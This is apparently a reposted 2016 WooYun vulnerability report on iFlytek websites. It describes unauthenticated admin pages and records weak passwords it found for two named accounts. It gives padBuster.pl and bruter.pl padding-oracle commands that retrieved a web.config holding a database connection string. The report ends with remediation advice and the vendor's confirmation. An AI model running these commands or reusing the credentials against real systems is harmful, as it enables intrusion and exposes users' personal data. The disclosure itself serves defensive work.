科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

admin
admin
admin
139891
文章
114
评论
2017年4月16日01:58:51评论759 views字数 265阅读0分53秒阅读模式
摘要

2016-04-03: 细节已通知厂商并且等待厂商处理中
2016-04-07: 厂商已经确认,细节仅向厂商公开
2016-04-17: 细节向核心白帽子及相关领域专家公开
2016-04-27: 细节向普通白帽子公开
2016-05-07: 细节向实习白帽子公开
2016-05-22: 细节向公众公开

漏洞概要 关注数(11) 关注此漏洞

缺陷编号: WooYun-2016-192208

漏洞标题: 科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

相关厂商: iflytek.com

漏洞作者: harbour_bin

提交时间: 2016-04-03 21:49

公开时间: 2016-05-22 09:10

漏洞类型: 未授权访问/权限绕过

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 越权操作 未授权访问 用户敏感信息泄露

1人收藏

漏洞详情

披露状态:

2016-04-03: 细节已通知厂商并且等待厂商处理中
2016-04-07: 厂商已经确认,细节仅向厂商公开
2016-04-17: 细节向核心白帽子及相关领域专家公开
2016-04-27: 细节向普通白帽子公开
2016-05-07: 细节向实习白帽子公开
2016-05-22: 细节向公众公开

简要描述:

测试依然在继续...

详细说明:

code 区域 
http://recordser.iflytek.com/

#1 未授权访问, 越权至后台

code 区域 
http://recordser.iflytek.com/UserContent/UserContentList
 http://recordser.iflytek.com/UserContent/UserList
 http://recordser.iflytek.com/UserContent/TaskList
 http://recordser.iflytek.com/InspectTask/UserList
 http://recordser.iflytek.com/InspectTask/TaskList
 http://recordser.iflytek.com/App/Index

简单证明:

科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

仅证明, 不一一截图了

#2 依据未授权的页面, 收集用户帐号(管理员权限即可), Fuzz简单测试后获取弱密码, 其他还有的, 不列出来了

code 区域 
baby 123456
 ylwang9 123456

管理员权限登陆后台

科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

#3 证明危害

可查看任意用户密码

普通用户:

科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

管理员, 可先取消管理权限, 再查看密码

科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

细节不在赘叙, 可查看1.7W用户手机号码、籍贯和密码, 提示说录音可换算为酬劳, 那就要重视了

录音信息证明:

科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

手机客户端版本:

科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

其他不一一截图了, 你们应该懂得

#4 另一个网站

code 区域 
http://ttsexperience.iflytek.com/

存在开放目录等问题

code 区域 
http://ttsexperience.iflytek.com/ipadVoice/Images/
 http://ttsexperience.iflytek.com/ipadVoice/css/
 http://ttsexperience.iflytek.com/ipadVoice/scripts/

#5 Padding Oracle Vulnerability漏洞

code 区域 
http://ttsexperience.iflytek.com/ipadVoice/Vowels.aspx

科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

第一步

code 区域 
padBuster.pl http://ttsexperience.iflytek.com/ipadVoice/WebResource.axd?d=Nt96HHZbQfgWzOVLGjKfdA2 Nt96HHZbQfgWzOVLGjKfdA2 16 -encoding 3 -plaintext "|||~/web.config"

跑出了第一步

科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

将第一步的加密地址带入第二步

code 区域 
bruter.pl http://ttsexperience.iflytek.com/ipadVoice/ScriptResource.axd dBIxytHH8O8dtsHZ2ykNlwAAAAAAAAAAAAAAAAAAAAA1 16

经过半个小时, 跑出第二步

科大讯飞未授权访问&Padding Oracle Vulnerability漏洞,可查看任意用户密码

直接访问

code 区域 
http://ttsexperience.iflytek.com/ipadVoice/ScriptResource.axd?d=FBTli1hthKbzxd2mfBJiMnQSMcrRx_DvHbbB2dspDZcAAAAAAAAAAAAAAAAAAAAA0
code 区域 
<?xml version="1.0" encoding="UTF-8"?>
 <!--
   有关如何配置 ASP.NET 应用程序的详细信息,请访问
   http://go.microsoft.com/fwlink/?LinkId=169433
   -->
 <configuration>
   <connectionStrings>
  <remove name="sqlserverConnStr" />
      <add name="sqlserverConnStr" connectionString="Data Source=.;Initial Catalog=Recorder;uid=sa;;" providerName="System.Data.SqlClient" />
   </connectionStrings>
  <system.web>
  <compilation debug="true" targetFramework="4.0" />
   <pages  enableViewStateMac="false"></pages>
     <customErrors mode="Off"/>
  </system.web>
     <system.webServer>
         <staticContent>
             <mimeMap fileExtension=".mp4" mimeType="application/octet-stream" />
             <mimeMap fileExtension=".json" mimeType="application/x-javascript" />
         </staticContent>
         <defaultDocument>
             <files>
                 <add value="index.aspx" />
             </files>
         </defaultDocument>
     </system.webServer>
 </configuration>

漏洞证明:

已证明!

修复方案:

1、Padding Oracle Vulnerability漏洞, 安装微软官方补丁;

2、未授权访问, 进行权限认证;

3、帐号体系控制不严, 对弱密码进行检测, 弱密码比较多;

4、安全意识有时候比技术更加重要吧.

版权声明:转载请注明来源 harbour_bin@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-07 09:09

厂商回复:

感谢提交,正在安排修复。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-07 09:23 | 小红猪 ( 普通白帽子 | Rank:341 漏洞数:42 | little red pig!)

    1

    好老且少见的洞

  2. 2016-04-07 09:47 | harbour_bin ( 普通白帽子 | Rank:600 漏洞数:69 | 好好提升自己...)

    1

    @小红猪 嗯啊, 第一次成功, 忍不住就发了

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin